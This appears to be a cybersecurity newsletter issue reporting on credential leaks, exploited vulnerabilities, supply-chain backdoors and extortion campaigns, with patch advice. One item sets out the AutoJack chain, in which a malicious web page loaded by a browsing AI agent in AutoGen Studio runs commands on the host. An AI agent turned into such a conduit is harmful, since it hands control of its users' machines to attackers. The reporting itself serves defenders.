In partnership with
|
FACT
|
North Korea stole $1.34 billion in cryptocurrency in 2024, accounting for 61% of all crypto stolen globally that year, across just 47 incidents averaging $28 million per heist. That's not a hacking operation. That's a state revenue program. (Chainalysis 2025 Crypto Crime Report)
|
|
The perimeter isn't leaking; it's already drained. This edition tracks what happened when state actors and criminals stopped probing enterprise defenses and started systematically harvesting the credentials those defenses were supposed to protect.
PS — Was this forwarded to you? Subscribe free at exzeccyber.com/subscribe →
|
|
CREDENTIAL EXPOSURE
Your Fortinet Credentials Are Already Out There
Intro
Someone exposed a server holding VPN credentials for 73,000 Fortinet firewalls, and named organizations in the dataset include Chevron, Samsung, AT&T, PwC, and a Turkish NATO defense contractor.
What Happened
Security researcher Bob Diachenko found a publicly exposed server containing FortiGate VPN credentials for 73,932 firewall URLs across 194 countries and 21,632 unique domains. Russian-speaking threat actors separately conducted roughly 1.16 billion credential attempts against more than 320,000 FortiGate targets using a 45-GPU cluster to crack SSL VPN hashes, then moved laterally into Active Directory environments. The credentials were confirmed by Kevin Beaumont and Hudson Rock.
Why It Matters
This is not a vulnerability disclosure with a patch coming. No CVE has been identified, and the source of the configuration data is still unknown. The attack surface is roughly half of all internet-accessible Fortinet firewalls.
The Other Side
Fortinet confirmed awareness and notes that many exposed credentials may already be inactive. Hudson Rock published a free lookup tool so organizations can check whether their devices appear in the dataset.
| |
👉 Takeaway
Rotate every FortiGate VPN and admin interface password now. Enable MFA. Pull the last 30 days of gateway logs and look for anomalous authentication attempts. This is a "do it today, not this week" situation.
|
TL;DR: Russian hackers harvested credentials for 73K Fortinet firewalls, including orgs you've heard of, and there's no patch coming.
|
| |
LAW ENFORCEMENT
International law enforcement cleaned SocGholish (FakeUpdates) from 14,971 compromised WordPress sites and took 106 servers and domains offline as part of Operation Endgame. SocGholish is Evil Corp's calling card, the group behind Zeus, Dridex, and WastedLocker, and it has served as the first-stage foothold for ransomware gangs including LockBit and RansomHub for years. This is the third phase of Operation Endgame, which has now dismantled infrastructure tied to nine major malware families since 2024.
→ If you run WordPress, check plugin and theme versions and review recent login logs. SocGholish spread primarily through compromised themes and plugins, not the WordPress core.
|
| |
VULNERABILITY
CVE-2026-23111: a single misplaced character in the nf_tables networking module creates a use-after-free bug that lets an unprivileged user escalate to root and escape containers. A working public exploit has been available since April, and Exodus Intelligence published a detailed write-up on June 8. Debian Bookworm/Trixie, Ubuntu 22.04/24.04, and RHEL 10 are all affected. No confirmed in-the-wild exploitation yet, but the exploit code is out and documented in detail.
→ Update your kernel and reboot. There's nothing subtle about this fix.
|
| |
EXTORTION
A new extortion group called Icarus compromised Klue, a competitive intelligence tool integrated with Salesforce, by pushing a malicious OAuth token harvesting update to Klue's integration code. Any org with the Klue-Salesforce connection active had OAuth tokens exposed, and Icarus has since expanded to similar integrations with HubSpot, SharePoint, Zoom, Gong, and Slack. Salesforce disabled the Klue integration on June 11. Affected organizations are receiving extortion demands via Session Messenger from an operator using the alias "mr bean."
→ Audit your SaaS OAuth connections. Revoke anything you don't actively use, and check your Salesforce and Slack integration logs for anything touching Klue since April 2026.
|
|
LLM traffic converts 3× better than Google search
58% of buyers now start their research in ChatGPT or Gemini, not Google. Most startups aren't showing up there yet.
The ones that are get cited by the AI tools their buyers, investors, and future hires already use. And they convert at 3×.
| |
AI AGENT SECURITY
Microsoft's Defender Security Research Team disclosed AutoJack on June 18: an exploit chain in AutoGen Studio's MCP WebSocket that lets a single malicious web page spawn processes on the host machine. No credentials, no sign-in, no further user interaction after the agent loads the page. The flaw chains three weaknesses: the socket trusts localhost connections (which a browsing agent inherits), authentication middleware skips MCP paths, and the endpoint runs commands from request parameters with no executable allowlist. Affected builds are pre-release PyPI versions 0.4.3.dev1 and 0.4.3.dev2; stable 0.4.2.2 is clean, and no wild exploitation has been reported.
→ If your team uses pre-release AutoGen Studio builds for agent prototyping, update to 0.4.2.2 today. AutoJack is less about one bug and more about what happens when AI frameworks bolt on web access without thinking through the security model.
|
| |
SUPPLY CHAIN
Sapphire Sleet, North Korea's BlueNoroff financial crime unit, compromised the npm account of a Mastra AI framework maintainer and published backdoored updates to 144 packages in the @mastra scope on June 17, all in 88 minutes. The injected dependency ("easy-day-js," spoofing the legitimate dayjs library) ran an obfuscated postinstall hook, disabled TLS certificate verification, established C2, and deployed a PowerShell backdoor that survived reboots. The second-stage payload hunts 166 cryptocurrency wallet browser extensions on Windows, Linux, and macOS. Mastra's @mastra/core package pulls around 918,000 downloads per week.
→ If you updated any @mastra packages since June 17, treat your development machine as potentially compromised and follow Mastra's incident response steps on GitHub. North Korea going after AI developer tooling is not a new playbook: it's an escalation of the same crypto-theft operation running since 2017.
|
|
| |
NATION-STATE
NCSC CEO Richard Horne told RUSI's Annual Security Lecture on June 17 that his teams handled over 200 incidents affecting UK critical infrastructure in the past year, and roughly three-quarters are attributed to state actors. That works out to four nationally significant cyber incidents every week. He named Volt Typhoon's prepositioning activity explicitly, called AI tools "highly likely" to exploit vulnerabilities in aging infrastructure by 2028, and put it plainly: "In cyberspace we are not preparing for tomorrow's conflicts. To some degree we are fighting them today."
→ If you're in critical infrastructure or supply to it, treat prepositioning as your actual threat model, not just active intrusion. The UK numbers are a proxy for what's happening everywhere.
|
| |
ACTIVE EXPLOITATION
Three FortiSandbox CVEs (CVE-2026-39813, CVE-2026-39808, and CVE-2026-25089, all CVSS 9.1) are under active exploitation. The newest, CVE-2026-25089, was patched June 10 and saw active exploitation within 24 hours. Threat intelligence firm Defused Cyber found that the exploit for CVE-2026-25089 shows signs of AI development: it worked in standard conditions but failed on edge cases, which is consistent with AI-generated code that handles happy paths and falls apart under pressure. Notably, FortiSandbox is Fortinet's enterprise malware analysis product, and the irony of attackers using AI to break a security tool is not subtle.
→ Patch FortiSandbox now. CVE-2026-39813 and CVE-2026-39808 have been exploitable since April, and if you haven't addressed those, you have three critical RCE vulnerabilities to remediate today.
|
|
| |
Practical play
June's Patch Tuesday delivered 200 vulnerabilities (33 Critical, 6 zero-days including the YellowKey BitLocker bypass and GreenPlasma CTFMON privilege escalation), but the most time-sensitive item isn't a vulnerability. The 2011 Secure Boot certificate authority expires June 26. If your endpoints haven't received the new Secure Boot certificate update before Thursday, they silently lose Secure Boot protection with no error, no warning, and no indication anything changed. This affects Windows endpoints that haven't received the relevant KB through Windows Update or WSUS.
→ Run Confirm-SecureBootUEFI in PowerShell to check status, verify your WSUS or Intune policies are distributing the new cert KB, and treat this as a four-day countdown starting now.
|
|
Smarter browsing. Your data never leaves the room.
Most AI tools are a trade — your data for intelligence. Norton Neo breaks that deal. Powerful built-in AI, anti-fingerprinting, VPN, and ad blocking come standard. No setup. No add-ons. No compromises. Search, summarize, and write with AI that works inside your browser and stays there.
Strange but real
Your Smart TV Is Quietly Renting Out Your Internet Connection to AI
Intro
Free smart TV apps have a business model you didn't agree to, but technically consented to somewhere in a settings screen you didn't read.
What Happened
Bright Data (formerly Luminati, the company that operates the world's largest residential proxy network with 400+ million IPs) embeds its SDK into free TV apps including Petflix on Roku, PlayWorks Digital, CloudTV, and Longvision. When those apps run, your smart TV becomes a relay node for web scraping traffic. The SDK configuration allows up to 200 GB of your home internet connection per month. Researchers from Include Security found that the channel handling those scraping jobs uses "none of the usual security checks": the authentication relies only on a public app ID and version number, which Bright Data publishes openly.
Why It Matters
Your home IP address is laundering web scraping requests for AI training pipelines, bypassing the rate limits and anti-bot systems on whatever sites are being scraped. Smart TVs are ideal targets: always on, fast home connections, effectively unmetered, and almost never monitored.
The Other Side
Bright Data argues users consent via opt-in screens and that average usage is about 50 MB per day, well under the 200 GB maximum. The opt-in text says usage will occur "occasionally." The SDK config says 200 GB.
| |
👉 Takeaway
Block these domains at your router or Pi-hole: proxyjs.brdtnet.com, proxyjs.luminatinet.com, proxyjs.bright-sdk.com. If you have a smart TV running free apps, assume it's participating unless you've explicitly blocked those endpoints.
|
TL;DR: Free TV apps rent your home internet to AI companies without telling you clearly, and the authentication protecting that access is embarrassingly weak.
|
Stop spending more time double-checking your books than growing your business. BELAY provides the financial clarity and "peace of mind" you need to lead with confidence. Get your time back today. Get the Free Guide
